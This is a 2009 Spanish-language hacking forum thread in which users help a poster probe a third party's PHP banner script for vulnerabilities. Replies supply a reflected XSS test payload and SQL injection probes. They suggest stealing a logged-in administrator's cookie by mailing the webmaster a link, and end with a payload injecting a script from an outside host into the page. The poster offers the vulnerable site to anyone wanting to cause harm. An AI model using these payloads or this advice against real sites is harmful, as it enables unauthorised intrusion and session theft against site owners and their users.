Título: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 22 Agosto 2009, 17:14 pm Hola genteee..
Les comento lo que tengo... Este link: http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=yyyyyyyy&ancho=zzzzzzzzzzzzzz me devuelve: Código ------------------------ Este link: http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="&ancho=zzzzzzzzzzzzzz Devuelve: Código ------------------------ Este link: http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=>&ancho=zzzzzzzzzzzzzz Devuelve: Código ------------------------ Este link: http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="<!--&ancho=zzzzzzzzzzzzzz Devuelve: Código
Segun sus sabias miradas.. hay alguna vulnerabilidad??? AGREGO: Si quieren que les mande mas links.. con mas pruebas. diganme que pongo.. Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: fede_cp en 22 Agosto 2009, 19:19 pm hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script>
si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir fijate otros tipos de cadenas como php?idnoticia=33, y ahi podras inyectar,o http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=1 te tenderia que no decir nada, y haciendo http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=0 tendria que cambiar algo. fijate algunos tutos de por ahi saludps Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 22 Agosto 2009, 22:22 pm Si, el 1º dió el aviso de "5" en una alerta...
Buscaré algo de crosscripting.. Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: WHK en 23 Agosto 2009, 03:17 am Hola, sip eso es xss.
lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo. Busca acá: http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html hay buenos tutos sobre XSS. Si tienes duda sobre alguno nos cuentas. Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: fede_cp en 23 Agosto 2009, 18:19 pm claro,tambien fijate si hay sql inyection que es mas provechoso :rolleyes:
saludos Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: berz3k en 25 Agosto 2009, 12:42 pm Intenta los vectores comunes, como el "power of "'"" <-agregar la comilla simple o comillas etc, ademas de ello intenta mas chars, de momento solo noto el XSS, ya nos contaras.
-berz3k. Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 25 Agosto 2009, 16:06 pm Intenta los vectores comunes, como el "power of "'"" <-agregar la comilla simple o comillas etc, ademas de ello intenta mas chars, de momento solo noto el XSS, ya nos contaras. -berz3k. La comilla comun, y la simple se traspasan a: \' o \" Fijate que en el 1º psot puse el ejemplo de la comilla doble.. claro,tambien fijate si hay sql inyection que es mas provechoso :rolleyes: saludos Y como puedo probar ello??.. dime algun codigo... Hola, sip eso es xss. Y como podria hacer eso de las cookies??? Porque podria enviarle un e-mail de contacto al webmaster y ta vez caiga... :)lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo. Busca acá: http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html hay buenos tutos sobre XSS. Si tienes duda sobre alguno nos cuentas. AGREGO: El - y ; tambien entran a la perfeccion.. Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: fede_cp en 25 Agosto 2009, 16:28 pm "dime algún codigo" :¬¬ busca que esta lleno de tutoriales, te dejo uno de los mejores que está en este foro, solo hay que buscar http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html (http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html)
espero que sigas aprendiendo y buscando saludos Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 25 Agosto 2009, 19:43 pm Ahora bien.. tengo una gran duda..
Cuando mando: Código Me manda éste codigo fuente: Código
como podria hacer para que me tome realmente eso que mandé como PHP??? Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: YST en 25 Agosto 2009, 19:49 pm Es que no hay inyección de codigo PHP si no que hay un XSS (http://es.wikipedia.org/wiki/Cross-site_scripting) que permite solo la inyección de codigo HTML ;) .
Saludos Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Jubjub en 25 Agosto 2009, 20:23 pm No se puede inyectar php mas que en funciones eval ()
Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 25 Agosto 2009, 20:51 pm Buen punto... Muchas gracias..
Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo... Mejor dejo todo tranquilo.. sin maldades.. Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad... Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Og. en 26 Agosto 2009, 03:04 am Buen punto... Muchas gracias.. nop xDCreo que sin poder ingresar el ' y " voy a ahcer poca cosa solo... Mejor dejo todo tranquilo.. sin maldades.. Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad... Código: <script src=http://tudominio/tuscript.js ></script> Saludos! Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Skeletron en 26 Agosto 2009, 03:09 am Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG Título: Re: Necesito ayuda con inyeccion por PHP Publicado por: Og. en 26 Agosto 2009, 03:24 am hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script> si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir saludps Si, el 1º dió el aviso de "5" en una alerta... entonces:Buscaré algo de crosscripting.. Código: http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script src=http://tudominio/tuscript.js ></script> saludos! |